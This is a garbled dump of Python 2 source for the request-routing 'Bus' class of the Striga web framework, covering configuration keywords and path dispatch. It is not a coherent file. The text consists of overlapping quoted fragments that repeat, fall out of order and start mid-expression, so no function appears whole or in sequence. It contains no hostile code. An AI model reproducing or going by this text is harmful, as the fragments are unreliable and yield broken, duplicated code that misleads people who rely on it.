rootdir) return l._configure(conffilename =", "found: {0}\".format(path)) raise striga.core.exception.StrigaBusError('NotFound') else: ctx.req.Vars.SITEBUS['LastPath'] = path.pop(0) bm(ctx, path) except 
striga.core.exception._StrigaClientRedirectBase: #", "except: ctx.err.exctype, ctx.err.excvalue = sys.exc_info()[:2] prev_excvalue = copy.copy(ctx.err.excvalue) if self.ErrorBus is not None:", "self.ErrorBus = ErrorBus() rootdir = os.path.join(self.RootDir, rootdir) return self.ErrorBus._configure(conffilename = conffilename, rootdir =", "= createitemfnct() self.CrossroadBusItems[path] = nbi return nbi def _configure(self, conffilename, index = None,", "self._InsertBusItem(path, functools.partial(View, self.RootDir, source, mode, entry, pathlimit)) def __configure_componentbus(self, conffilename, component, path =", "rootdir = os.path.dirname(conffilename) self.RootDir = os.path.normpath(os.path.abspath(rootdir)) if not os.path.isdir(self.RootDir): if os.path.exists(self.RootDir): L.warning(\"Bus item", "= os.path.join(self.RootDir, rootdir) return l._configure(conffilename = conffilename, index = index, rootdir = rootdir)", "default sitebus item too ''' from ._stsvcsb_location import Location l = self._InsertBusItem(path, Location)", ": self._configure_finished, }) return defs def __configure_location(self, conffilename, path = None, index =", "conffilename, index = index, rootdir = rootdir) def __configure_errorbus(self, conffilename, rootdir = '.'):", "L import striga.core.exception ### class Bus(object): CustomSiteBusDefs = {} PathCheckRE = re.compile(r'^[^//]*$') def", "for '%s' is already configured!\" % path) nbi = createitemfnct() self.CrossroadBusItems[path] = nbi", "path) nbi = createitemfnct() self.CrossroadBusItems[path] = nbi return nbi def _configure(self, conffilename, index", "find item in CrossroadBusItems & DefaultBusItem bm = self.CrossroadBusItems.get(path[0], None) if bm is", "view ''' from ._stsvcsb_view import View self._InsertBusItem(path, functools.partial(View, self.RootDir, source, mode, entry, pathlimit))", "rootdir = '.'): ''' Config keyword - exec ''' from ._stsvcsb_exec import Exec", "[] #Iterate thru this (call each) in the begining 
self.CrossroadBusItems = {} #Check", "not directory: '%s'\" % (self.RootDir)) else: L.warning(\"Bus item root directory doesn't exist: '%s'\"", "rootdir is None: rootdir = os.path.dirname(conffilename) self.RootDir = os.path.normpath(os.path.abspath(rootdir)) if not os.path.isdir(self.RootDir): if", "''' Config keyword - componentbus ''' from ._stsvcsb_compbusref import ComponentBusRef self._InsertBusItem(path, functools.partial(ComponentBusRef, component,", "DefaultBusItem bm = self.CrossroadBusItems.get(path[0], None) if bm is None: bm = self.DefaultBusItem if", "'view' : self.__configure_view, 'exec' : self.__configure_exec, 'controller' : self.__configure_controller, 'componentbus' : self.__configure_componentbus, '!'", "''' Config keyword - serve ''' from ._stsvcsb_serve import Serve self._InsertBusItem(path, functools.partial(Serve, self.RootDir,", "None: if self.DefaultBusItem is not None: raise striga.core.exception.StrigaConfigurationError(\"Default bus item is already configured!\")", "None self.ErrorBus = None def _InsertBusItem(self, path, createitemfnct): if path is None: if", "componentbus ''' from ._stsvcsb_compbusref import ComponentBusRef self._InsertBusItem(path, functools.partial(ComponentBusRef, component, busname)) def __configure_exec(self, conffilename,", "return False except: L.exception(\"Exception during error bus processing:\") raise prev_excvalue else: raise def", "= os.path.join(self.RootDir, rootdir) return self.ErrorBus._configure(conffilename = conffilename, rootdir = rootdir) def __configure_var(self, conffilename,", "entry='main', pathlimit='==0'): ''' Config keyword - view ''' from ._stsvcsb_view import View self._InsertBusItem(path,", "._stsvcsb_view import View self._InsertBusItem(path, functools.partial(View, self.RootDir, source, mode, entry, pathlimit)) def __configure_componentbus(self, conffilename,", "self.ErrorBus is not None: self.ErrorBus.BusStart() def BusStop(self): if self.ErrorBus is not None: 
self.ErrorBus.BusStop()", "from ._stsvcsb_compbusref import ComponentBusRef self._InsertBusItem(path, functools.partial(ComponentBusRef, component, busname)) def __configure_exec(self, conffilename, source, entry,", "raise striga.core.exception.StrigaBusError('NotFound') val = path.pop(0) if val == '': val = default ctx.req.Vars.SITEBUS[name]", "each) in the begining self.CrossroadBusItems = {} #Check path against this, if ok,", "= conffilename) def _configure_finished(self): pass def __call__(self, ctx, path): ''' Entry point to", "os, sys, re, functools, copy, logging as L import striga.core.exception ### class Bus(object):", "def _configure(self, conffilename, index = None, rootdir = None): if rootdir is None:", "'BusStart'): self.DefaultBusItem.BusStart() if self.ErrorBus is not None: self.ErrorBus.BusStart() def BusStop(self): if self.ErrorBus is", "self._InsertBusItem(path, functools.partial(Exec, rootdir, source, entry, pathlimit)) def __configure_controller(self, conffilename, source, controllerclass = 'Controller',", "not found: {0}\".format(path)) raise striga.core.exception.StrigaBusError('NotFound') else: ctx.req.Vars.SITEBUS['LastPath'] = path.pop(0) bm(ctx, path) except striga.core.exception._StrigaClientRedirectBase:", "''' Config keyword - exec ''' from ._stsvcsb_exec import Exec rootdir = os.path.join(self.RootDir,", "prev_excvalue = copy.copy(ctx.err.excvalue) if self.ErrorBus is not None: if isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError): epath =", "processing (you should use StrigaBusError exceptions)\") epath = str(ctx.err.exctype) try: self.ErrorBus(ctx, epath) return", "path.append(self.Index) else: raise striga.core.exception.StrigaBusError(\"NotFound\") #Then find item in CrossroadBusItems & DefaultBusItem bm =", "directory is not directory: '%s'\" % (self.RootDir)) else: L.warning(\"Bus item root directory doesn't", "if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStart'): 
self.DefaultBusItem.BusStart() if self.ErrorBus is not", "pass def __call__(self, ctx, path): ''' Entry point to this bus object '''", "this, if ok, call item from that self.DefaultBusItem = None #Call when not", "% (self.RootDir)) self.Index = index defs = {} for key, fn in self.CustomSiteBusDefs.iteritems():", "self.ErrorBus = None def _InsertBusItem(self, path, createitemfnct): if path is None: if self.DefaultBusItem", "= ctx.req.Vars.SITEBUS SiteBusVar['RootDir'] = self.RootDir SiteBusVar['Location'] = self try: #First iterate thru IntroBusItems", "functools.partial(Controller, rootdir, source, controllerclass, pathlimit)) return nbi._configure(conffilename = conffilename) def _configure_finished(self): pass def", "'location' : self.__configure_location, 'errorbus' : self.__configure_errorbus, 'var' : self.__configure_var, 'serve' : self.__configure_serve, 'view'", "import Controller rootdir = os.path.join(self.RootDir, rootdir) nbi = self._InsertBusItem(path, functools.partial(Controller, rootdir, source, controllerclass,", "### def BusVar(name, default, ctx, path): if len(path) == 0: raise striga.core.exception.StrigaBusError('NotFound') val", "array if len(path) == 0: if self.Index is not None: path.append(self.Index) else: raise", "Bus(object): CustomSiteBusDefs = {} PathCheckRE = re.compile(r'^[^//]*$') def __init__(self): self.IntroBusItems = [] #Iterate", "= None): if rootdir is None: rootdir = os.path.dirname(conffilename) self.RootDir = os.path.normpath(os.path.abspath(rootdir)) if", "'.'): ''' @param path - can be None as location can be default", "striga.core.exception._StrigaClientRedirectBase: # Redirections are not solved thru ErrorBus raise except: ctx.err.exctype, ctx.err.excvalue =", "- view ''' from ._stsvcsb_view import View self._InsertBusItem(path, functools.partial(View, self.RootDir, source, mode, entry,", "__configure_location(self, conffilename, path = None, index = None, rootdir = '.'): ''' @param", "is already configured!\" % path) 
nbi = createitemfnct() self.CrossroadBusItems[path] = nbi return nbi", "__configure_view(self, conffilename, source, mode, path = None, entry='main', pathlimit='==0'): ''' Config keyword -", "source, controllerclass = 'Controller', path = None, pathlimit = '==0', rootdir = '.'):", "''' @param path - can be None as location can be default sitebus", ": self.__configure_controller, 'componentbus' : self.__configure_componentbus, '!' : self._configure_finished, }) return defs def __configure_location(self,", "= None def _InsertBusItem(self, path, createitemfnct): if path is None: if self.DefaultBusItem is", "= index, rootdir = rootdir) def __configure_errorbus(self, conffilename, rootdir = '.'): if self.ErrorBus", "striga.core.exception ### class Bus(object): CustomSiteBusDefs = {} PathCheckRE = re.compile(r'^[^//]*$') def __init__(self): self.IntroBusItems", "os.path.join(self.RootDir, rootdir) nbi = self._InsertBusItem(path, functools.partial(Controller, rootdir, source, controllerclass, pathlimit)) return nbi._configure(conffilename =", "_configure_finished(self): pass def __call__(self, ctx, path): ''' Entry point to this bus object", "for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStop'): bm.BusStop() for bm in self.IntroBusItems: if", "= createitemfnct() return self.DefaultBusItem if self.PathCheckRE.match(path) is None: raise striga.core.exception.StrigaConfigurationError(\"Invalid path '%s' given!\"", "import os, sys, re, functools, copy, logging as L import striga.core.exception ### class", "is not None: path.append(self.Index) else: raise striga.core.exception.StrigaBusError(\"NotFound\") #Then find item in CrossroadBusItems &", "not None: if isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError): epath = ctx.err.excvalue.Name else: L.exception(\"Generic exception during bus", "= {} PathCheckRE = re.compile(r'^[^//]*$') def __init__(self): self.IntroBusItems = [] #Iterate thru this", "path '%s' given!\" % path) if 
self.CrossroadBusItems.has_key(path): raise striga.core.exception.StrigaConfigurationError(\"Bus item for '%s' is", "can be default sitebus item too ''' from ._stsvcsb_location import Location l =", "rootdir = os.path.join(self.RootDir, rootdir) nbi = self._InsertBusItem(path, functools.partial(Controller, rootdir, source, controllerclass, pathlimit)) return", "& DefaultBusItem bm = self.CrossroadBusItems.get(path[0], None) if bm is None: bm = self.DefaultBusItem", "raise def BusStart(self): for bm in self.IntroBusItems: if hasattr(bm, 'BusStart'): bm.BusStart() for bm", "item is already configured!\") self.DefaultBusItem = createitemfnct() return self.DefaultBusItem if self.PathCheckRE.match(path) is None:", "item from that self.DefaultBusItem = None #Call when not found anything in self.CrossroadBusItems", "re, functools, copy, logging as L import striga.core.exception ### class Bus(object): CustomSiteBusDefs =", "serve ''' from ._stsvcsb_serve import Serve self._InsertBusItem(path, functools.partial(Serve, self.RootDir, pattern, buffersize)) def __configure_view(self,", "SiteBusVar = ctx.req.Vars.SITEBUS SiteBusVar['RootDir'] = self.RootDir SiteBusVar['Location'] = self try: #First iterate thru", "in self.IntroBusItems: ibm(ctx, path) #Check again as IntroBusItems can change path array if", "= 'Controller', path = None, pathlimit = '==0', rootdir = '.'): ''' Config", "in self.CrossroadBusItems self.RootDir = None self.Index = None self.ErrorBus = None def _InsertBusItem(self,", "= None #Call when not found anything in self.CrossroadBusItems self.RootDir = None self.Index", "conffilename) def _configure_finished(self): pass def __call__(self, ctx, path): ''' Entry point to this", "createitemfnct): if path is None: if self.DefaultBusItem is not None: raise striga.core.exception.StrigaConfigurationError(\"Default bus", "- componentbus ''' from ._stsvcsb_compbusref import ComponentBusRef self._InsertBusItem(path, functools.partial(ComponentBusRef, component, 
busname)) def __configure_exec(self,", "self.CrossroadBusItems.get(path[0], None) if bm is None: bm = self.DefaultBusItem if bm is None:", "View self._InsertBusItem(path, functools.partial(View, self.RootDir, source, mode, entry, pathlimit)) def __configure_componentbus(self, conffilename, component, path", "bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStart'): bm.BusStart() if (self.DefaultBusItem is not None) and", "pathlimit)) def __configure_componentbus(self, conffilename, component, path = None, busname = 'componentbus'): ''' Config", "= '.'): ''' Config keyword - exec ''' from ._stsvcsb_exec import Exec rootdir", "else: L.warning(\"Bus item root directory doesn't exist: '%s'\" % (self.RootDir)) self.Index = index", "and hasattr(self.DefaultBusItem, 'BusStart'): self.DefaultBusItem.BusStart() if self.ErrorBus is not None: self.ErrorBus.BusStart() def BusStop(self): if", "None, buffersize = 64*1024): ''' Config keyword - serve ''' from ._stsvcsb_serve import", "path = None, busname = 'componentbus'): ''' Config keyword - componentbus ''' from", "None self.Index = None self.ErrorBus = None def _InsertBusItem(self, path, createitemfnct): if path", "= self.RootDir SiteBusVar['Location'] = self try: #First iterate thru IntroBusItems for ibm in", "val = path.pop(0) if val == '': val = default ctx.req.Vars.SITEBUS[name] = val", "'errorbus' : self.__configure_errorbus, 'var' : self.__configure_var, 'serve' : self.__configure_serve, 'view' : self.__configure_view, 'exec'", "% path) if self.CrossroadBusItems.has_key(path): raise striga.core.exception.StrigaConfigurationError(\"Bus item for '%s' is already configured!\" %", "functools.partial(View, self.RootDir, source, mode, entry, pathlimit)) def __configure_componentbus(self, conffilename, component, path = None,", "pathlimit='==0'): ''' Config keyword - view ''' from ._stsvcsb_view import View self._InsertBusItem(path, functools.partial(View,", "copy.copy(ctx.err.excvalue) if self.ErrorBus is not 
None: if isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError): epath = ctx.err.excvalue.Name else:", "not found anything in self.CrossroadBusItems self.RootDir = None self.Index = None self.ErrorBus =", "'BusStart'): bm.BusStart() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStart'): bm.BusStart() if (self.DefaultBusItem is", "self._InsertBusItem(path, functools.partial(Controller, rootdir, source, controllerclass, pathlimit)) return nbi._configure(conffilename = conffilename) def _configure_finished(self): pass", "bm.BusStart() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStart'): self.DefaultBusItem.BusStart() if self.ErrorBus is", "bm.BusStop() ### def BusVar(name, default, ctx, path): if len(path) == 0: raise striga.core.exception.StrigaBusError('NotFound')", "nbi def _configure(self, conffilename, index = None, rootdir = None): if rootdir is", "(self.RootDir)) else: L.warning(\"Bus item root directory doesn't exist: '%s'\" % (self.RootDir)) self.Index =", "index = index, rootdir = rootdir) def __configure_errorbus(self, conffilename, rootdir = '.'): if", "location can be default sitebus item too ''' from ._stsvcsb_location import Location l", "@param path - can be None as location can be default sitebus item", "'var' : self.__configure_var, 'serve' : self.__configure_serve, 'view' : self.__configure_view, 'exec' : self.__configure_exec, 'controller'", "None: raise striga.core.exception.StrigaConfigurationError(\"Default bus item is already configured!\") self.DefaultBusItem = createitemfnct() return self.DefaultBusItem", "else: L.exception(\"Generic exception during bus processing (you should use StrigaBusError exceptions)\") epath =", "__call__(self, ctx, path): ''' Entry point to this bus object ''' SiteBusVar =", "None, rootdir = None): if rootdir is None: rootdir = os.path.dirname(conffilename) self.RootDir =", "None: L.warning(\"Bus item has already one errorbus defined - overwriting\") from 
._stsvcsb_errorbus import", "None: self.ErrorBus.BusStop() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStop'): self.DefaultBusItem.BusStop() for bm", "epath) return False except: L.exception(\"Exception during error bus processing:\") raise prev_excvalue else: raise", "= os.path.join(self.RootDir, rootdir) self._InsertBusItem(path, functools.partial(Exec, rootdir, source, entry, pathlimit)) def __configure_controller(self, conffilename, source,", "except: L.exception(\"Exception during error bus processing:\") raise prev_excvalue else: raise def BusStart(self): for", "already configured!\") self.DefaultBusItem = createitemfnct() return self.DefaultBusItem if self.PathCheckRE.match(path) is None: raise striga.core.exception.StrigaConfigurationError(\"Invalid", "path not found: {0}\".format(path)) raise striga.core.exception.StrigaBusError('NotFound') else: ctx.req.Vars.SITEBUS['LastPath'] = path.pop(0) bm(ctx, path) except", "hasattr(self.DefaultBusItem, 'BusStop'): self.DefaultBusItem.BusStop() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStop'): bm.BusStop() for bm", "can be None as location can be default sitebus item too ''' from", "def __configure_componentbus(self, conffilename, component, path = None, busname = 'componentbus'): ''' Config keyword", "name, default = 0): self.IntroBusItems.append(functools.partial(BusVar, name, default)) def __configure_serve(self, conffilename, pattern, path =", "default = 0): self.IntroBusItems.append(functools.partial(BusVar, name, default)) def __configure_serve(self, conffilename, pattern, path = None,", "defs[key] = functools.partial(fn, self) defs.update({ 'location' : self.__configure_location, 'errorbus' : self.__configure_errorbus, 'var' :", "= path.pop(0) bm(ctx, path) except striga.core.exception._StrigaClientRedirectBase: # Redirections are not solved thru ErrorBus", "already configured!\" % path) nbi = createitemfnct() self.CrossroadBusItems[path] = nbi return nbi 
def", "''' SiteBusVar = ctx.req.Vars.SITEBUS SiteBusVar['RootDir'] = self.RootDir SiteBusVar['Location'] = self try: #First iterate", "self.ErrorBus is not None: L.warning(\"Bus item has already one errorbus defined - overwriting\")", "keyword - componentbus ''' from ._stsvcsb_compbusref import ComponentBusRef self._InsertBusItem(path, functools.partial(ComponentBusRef, component, busname)) def", "# Redirections are not solved thru ErrorBus raise except: ctx.err.exctype, ctx.err.excvalue = sys.exc_info()[:2]", "mode, entry, pathlimit)) def __configure_componentbus(self, conffilename, component, path = None, busname = 'componentbus'):", "controllerclass, pathlimit)) return nbi._configure(conffilename = conffilename) def _configure_finished(self): pass def __call__(self, ctx, path):", "during bus processing (you should use StrigaBusError exceptions)\") epath = str(ctx.err.exctype) try: self.ErrorBus(ctx,", "self._InsertBusItem(path, functools.partial(ComponentBusRef, component, busname)) def __configure_exec(self, conffilename, source, entry, path = None, pathlimit", "def __configure_exec(self, conffilename, source, entry, path = None, pathlimit = '==0', rootdir =", "._stsvcsb_exec import Exec rootdir = os.path.join(self.RootDir, rootdir) self._InsertBusItem(path, functools.partial(Exec, rootdir, source, entry, pathlimit))", "._stsvcsb_cntrlr import Controller rootdir = os.path.join(self.RootDir, rootdir) nbi = self._InsertBusItem(path, functools.partial(Controller, rootdir, source,", "''' Entry point to this bus object ''' SiteBusVar = ctx.req.Vars.SITEBUS SiteBusVar['RootDir'] =", "= ctx.err.excvalue.Name else: L.exception(\"Generic exception during bus processing (you should use StrigaBusError exceptions)\")", "''' from ._stsvcsb_exec import Exec rootdir = os.path.join(self.RootDir, rootdir) self._InsertBusItem(path, functools.partial(Exec, rootdir, source,", "= self._InsertBusItem(path, Location) rootdir = os.path.join(self.RootDir, rootdir) return 
l._configure(conffilename = conffilename, index =", "Config keyword - Controller ''' from ._stsvcsb_cntrlr import Controller rootdir = os.path.join(self.RootDir, rootdir)", "if self.PathCheckRE.match(path) is None: raise striga.core.exception.StrigaConfigurationError(\"Invalid path '%s' given!\" % path) if self.CrossroadBusItems.has_key(path):", "= None self.ErrorBus = None def _InsertBusItem(self, path, createitemfnct): if path is None:", "rootdir = '.'): if self.ErrorBus is not None: L.warning(\"Bus item has already one", "os.path.join(self.RootDir, rootdir) return l._configure(conffilename = conffilename, index = index, rootdir = rootdir) def", "error bus processing:\") raise prev_excvalue else: raise def BusStart(self): for bm in self.IntroBusItems:", "None, index = None, rootdir = '.'): ''' @param path - can be", "''' from ._stsvcsb_compbusref import ComponentBusRef self._InsertBusItem(path, functools.partial(ComponentBusRef, component, busname)) def __configure_exec(self, conffilename, source,", "sys, re, functools, copy, logging as L import striga.core.exception ### class Bus(object): CustomSiteBusDefs", "this bus object ''' SiteBusVar = ctx.req.Vars.SITEBUS SiteBusVar['RootDir'] = self.RootDir SiteBusVar['Location'] = self", "ErrorBus self.ErrorBus = ErrorBus() rootdir = os.path.join(self.RootDir, rootdir) return self.ErrorBus._configure(conffilename = conffilename, rootdir", "not os.path.isdir(self.RootDir): if os.path.exists(self.RootDir): L.warning(\"Bus item root directory is not directory: '%s'\" %", "bm = self.CrossroadBusItems.get(path[0], None) if bm is None: bm = self.DefaultBusItem if bm", "(self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStop'): self.DefaultBusItem.BusStop() for bm in self.CrossroadBusItems.itervalues(): if", "path): if len(path) == 0: raise striga.core.exception.StrigaBusError('NotFound') val = path.pop(0) if val ==", "Controller ''' from ._stsvcsb_cntrlr import Controller rootdir = 
os.path.join(self.RootDir, rootdir) nbi = self._InsertBusItem(path,", "bus path not found: {0}\".format(path)) raise striga.core.exception.StrigaBusError('NotFound') else: ctx.req.Vars.SITEBUS['LastPath'] = path.pop(0) bm(ctx, path)", "raise striga.core.exception.StrigaConfigurationError(\"Default bus item is already configured!\") self.DefaultBusItem = createitemfnct() return self.DefaultBusItem if", "'==0', rootdir = '.'): ''' Config keyword - exec ''' from ._stsvcsb_exec import", "= str(ctx.err.exctype) try: self.ErrorBus(ctx, epath) return False except: L.exception(\"Exception during error bus processing:\")", "self.__configure_componentbus, '!' : self._configure_finished, }) return defs def __configure_location(self, conffilename, path = None,", "- serve ''' from ._stsvcsb_serve import Serve self._InsertBusItem(path, functools.partial(Serve, self.RootDir, pattern, buffersize)) def", "rootdir = rootdir) def __configure_var(self, conffilename, name, default = 0): self.IntroBusItems.append(functools.partial(BusVar, name, default))", "self.RootDir SiteBusVar['Location'] = self try: #First iterate thru IntroBusItems for ibm in self.IntroBusItems:", "Config keyword - exec ''' from ._stsvcsb_exec import Exec rootdir = os.path.join(self.RootDir, rootdir)", "from ._stsvcsb_serve import Serve self._InsertBusItem(path, functools.partial(Serve, self.RootDir, pattern, buffersize)) def __configure_view(self, conffilename, source,", "self.__configure_view, 'exec' : self.__configure_exec, 'controller' : self.__configure_controller, 'componentbus' : self.__configure_componentbus, '!' 
: self._configure_finished,", "% path) nbi = createitemfnct() self.CrossroadBusItems[path] = nbi return nbi def _configure(self, conffilename,", "as IntroBusItems can change path array if len(path) == 0: if self.Index is", "if hasattr(bm, 'BusStop'): bm.BusStop() for bm in self.IntroBusItems: if hasattr(bm, 'BusStop'): bm.BusStop() ###", "conffilename, source, controllerclass = 'Controller', path = None, pathlimit = '==0', rootdir =", "self.Index is not None: path.append(self.Index) else: raise striga.core.exception.StrigaBusError(\"NotFound\") #Then find item in CrossroadBusItems", "can change path array if len(path) == 0: if self.Index is not None:", "bm in self.IntroBusItems: if hasattr(bm, 'BusStart'): bm.BusStart() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm,", "'.'): ''' Config keyword - exec ''' from ._stsvcsb_exec import Exec rootdir =", "os.path.exists(self.RootDir): L.warning(\"Bus item root directory is not directory: '%s'\" % (self.RootDir)) else: L.warning(\"Bus", "one errorbus defined - overwriting\") from ._stsvcsb_errorbus import ErrorBus self.ErrorBus = ErrorBus() rootdir", "= None, index = None, rootdir = '.'): ''' @param path - can", "= self.CrossroadBusItems.get(path[0], None) if bm is None: bm = self.DefaultBusItem if bm is", "None): if rootdir is None: rootdir = os.path.dirname(conffilename) self.RootDir = os.path.normpath(os.path.abspath(rootdir)) if not", "keyword - serve ''' from ._stsvcsb_serve import Serve self._InsertBusItem(path, functools.partial(Serve, self.RootDir, pattern, buffersize))", "Redirections are not solved thru ErrorBus raise except: ctx.err.exctype, ctx.err.excvalue = sys.exc_info()[:2] prev_excvalue", "defined - overwriting\") from ._stsvcsb_errorbus import ErrorBus self.ErrorBus = ErrorBus() rootdir = os.path.join(self.RootDir,", "striga.core.exception.StrigaBusError(\"NotFound\") #Then find item in CrossroadBusItems & DefaultBusItem bm = self.CrossroadBusItems.get(path[0], None) if", "exec ''' from 
._stsvcsb_exec import Exec rootdir = os.path.join(self.RootDir, rootdir) self._InsertBusItem(path, functools.partial(Exec, rootdir,", "__configure_errorbus(self, conffilename, rootdir = '.'): if self.ErrorBus is not None: L.warning(\"Bus item has", "False except: L.exception(\"Exception during error bus processing:\") raise prev_excvalue else: raise def BusStart(self):", "given!\" % path) if self.CrossroadBusItems.has_key(path): raise striga.core.exception.StrigaConfigurationError(\"Bus item for '%s' is already configured!\"", "def __call__(self, ctx, path): ''' Entry point to this bus object ''' SiteBusVar", "is not None) and hasattr(self.DefaultBusItem, 'BusStart'): self.DefaultBusItem.BusStart() if self.ErrorBus is not None: self.ErrorBus.BusStart()", "= {} for key, fn in self.CustomSiteBusDefs.iteritems(): defs[key] = functools.partial(fn, self) defs.update({ 'location'", "if rootdir is None: rootdir = os.path.dirname(conffilename) self.RootDir = os.path.normpath(os.path.abspath(rootdir)) if not os.path.isdir(self.RootDir):", "ComponentBusRef self._InsertBusItem(path, functools.partial(ComponentBusRef, component, busname)) def __configure_exec(self, conffilename, source, entry, path = None,", "rootdir) return l._configure(conffilename = conffilename, index = index, rootdir = rootdir) def __configure_errorbus(self,", "l._configure(conffilename = conffilename, index = index, rootdir = rootdir) def __configure_errorbus(self, conffilename, rootdir", "ctx.err.excvalue.Name else: L.exception(\"Generic exception during bus processing (you should use StrigaBusError exceptions)\") epath", "nbi = self._InsertBusItem(path, functools.partial(Controller, rootdir, source, controllerclass, pathlimit)) return nbi._configure(conffilename = conffilename) def", "hasattr(bm, 'BusStart'): bm.BusStart() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStart'): bm.BusStart() if (self.DefaultBusItem", "(self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 
'BusStart'): self.DefaultBusItem.BusStart() if self.ErrorBus is not None:", "self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStop'): bm.BusStop() for bm in self.IntroBusItems: if hasattr(bm, 'BusStop'): bm.BusStop()", "item too ''' from ._stsvcsb_location import Location l = self._InsertBusItem(path, Location) rootdir =", "'exec' : self.__configure_exec, 'controller' : self.__configure_controller, 'componentbus' : self.__configure_componentbus, '!' : self._configure_finished, })", "index = None, rootdir = None): if rootdir is None: rootdir = os.path.dirname(conffilename)", "doesn't exist: '%s'\" % (self.RootDir)) self.Index = index defs = {} for key,", "path) except striga.core.exception._StrigaClientRedirectBase: # Redirections are not solved thru ErrorBus raise except: ctx.err.exctype,", "None: path.append(self.Index) else: raise striga.core.exception.StrigaBusError(\"NotFound\") #Then find item in CrossroadBusItems & DefaultBusItem bm", "''' from ._stsvcsb_cntrlr import Controller rootdir = os.path.join(self.RootDir, rootdir) nbi = self._InsertBusItem(path, functools.partial(Controller,", "None, busname = 'componentbus'): ''' Config keyword - componentbus ''' from ._stsvcsb_compbusref import", "hasattr(bm, 'BusStart'): bm.BusStart() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStart'): self.DefaultBusItem.BusStart() if", "conffilename, rootdir = rootdir) def __configure_var(self, conffilename, name, default = 0): self.IntroBusItems.append(functools.partial(BusVar, name,", "from ._stsvcsb_cntrlr import Controller rootdir = os.path.join(self.RootDir, rootdir) nbi = self._InsertBusItem(path, functools.partial(Controller, rootdir,", "ErrorBus raise except: ctx.err.exctype, ctx.err.excvalue = sys.exc_info()[:2] prev_excvalue = copy.copy(ctx.err.excvalue) if self.ErrorBus is", "for bm in self.IntroBusItems: if hasattr(bm, 'BusStart'): bm.BusStart() for bm in self.CrossroadBusItems.itervalues(): if", "if self.ErrorBus is not None: 
self.ErrorBus.BusStart() def BusStop(self): if self.ErrorBus is not None:", "if hasattr(bm, 'BusStart'): bm.BusStart() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStart'): self.DefaultBusItem.BusStart()", "if not os.path.isdir(self.RootDir): if os.path.exists(self.RootDir): L.warning(\"Bus item root directory is not directory: '%s'\"", "'componentbus' : self.__configure_componentbus, '!' : self._configure_finished, }) return defs def __configure_location(self, conffilename, path", "#First iterate thru IntroBusItems for ibm in self.IntroBusItems: ibm(ctx, path) #Check again as", "rootdir, source, entry, pathlimit)) def __configure_controller(self, conffilename, source, controllerclass = 'Controller', path =", "to this bus object ''' SiteBusVar = ctx.req.Vars.SITEBUS SiteBusVar['RootDir'] = self.RootDir SiteBusVar['Location'] =", "again as IntroBusItems can change path array if len(path) == 0: if self.Index", "= self.DefaultBusItem if bm is None: L.warning(\"Site bus path not found: {0}\".format(path)) raise", "exception during bus processing (you should use StrigaBusError exceptions)\") epath = str(ctx.err.exctype) try:", "is not None: self.ErrorBus.BusStop() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStop'): self.DefaultBusItem.BusStop()", "def __configure_location(self, conffilename, path = None, index = None, rootdir = '.'): '''", "keyword - view ''' from ._stsvcsb_view import View self._InsertBusItem(path, functools.partial(View, self.RootDir, source, mode,", "None: raise striga.core.exception.StrigaConfigurationError(\"Invalid path '%s' given!\" % path) if self.CrossroadBusItems.has_key(path): raise striga.core.exception.StrigaConfigurationError(\"Bus item", "self.CrossroadBusItems.has_key(path): raise striga.core.exception.StrigaConfigurationError(\"Bus item for '%s' is already configured!\" % path) nbi =", "root directory doesn't exist: '%s'\" % (self.RootDir)) self.Index = index defs = {}", "is not 
None: self.ErrorBus.BusStart() def BusStop(self): if self.ErrorBus is not None: self.ErrorBus.BusStop() if", "hasattr(bm, 'BusStop'): bm.BusStop() ### def BusVar(name, default, ctx, path): if len(path) == 0:", "rootdir = '.'): ''' @param path - can be None as location can", "entry, path = None, pathlimit = '==0', rootdir = '.'): ''' Config keyword", "prev_excvalue else: raise def BusStart(self): for bm in self.IntroBusItems: if hasattr(bm, 'BusStart'): bm.BusStart()", "Config keyword - view ''' from ._stsvcsb_view import View self._InsertBusItem(path, functools.partial(View, self.RootDir, source,", "self.__configure_location, 'errorbus' : self.__configure_errorbus, 'var' : self.__configure_var, 'serve' : self.__configure_serve, 'view' : self.__configure_view,", "- exec ''' from ._stsvcsb_exec import Exec rootdir = os.path.join(self.RootDir, rootdir) self._InsertBusItem(path, functools.partial(Exec,", "not None: path.append(self.Index) else: raise striga.core.exception.StrigaBusError(\"NotFound\") #Then find item in CrossroadBusItems & DefaultBusItem", "copy, logging as L import striga.core.exception ### class Bus(object): CustomSiteBusDefs = {} PathCheckRE", "None, pathlimit = '==0', rootdir = '.'): ''' Config keyword - Controller '''", "'.'): if self.ErrorBus is not None: L.warning(\"Bus item has already one errorbus defined", "'%s'\" % (self.RootDir)) self.Index = index defs = {} for key, fn in", "len(path) == 0: if self.Index is not None: path.append(self.Index) else: raise striga.core.exception.StrigaBusError(\"NotFound\") #Then", "def _configure_finished(self): pass def __call__(self, ctx, path): ''' Entry point to this bus", "- overwriting\") from ._stsvcsb_errorbus import ErrorBus self.ErrorBus = ErrorBus() rootdir = os.path.join(self.RootDir, rootdir)", "bm is None: L.warning(\"Site bus path not found: {0}\".format(path)) raise striga.core.exception.StrigaBusError('NotFound') else: ctx.req.Vars.SITEBUS['LastPath']", 
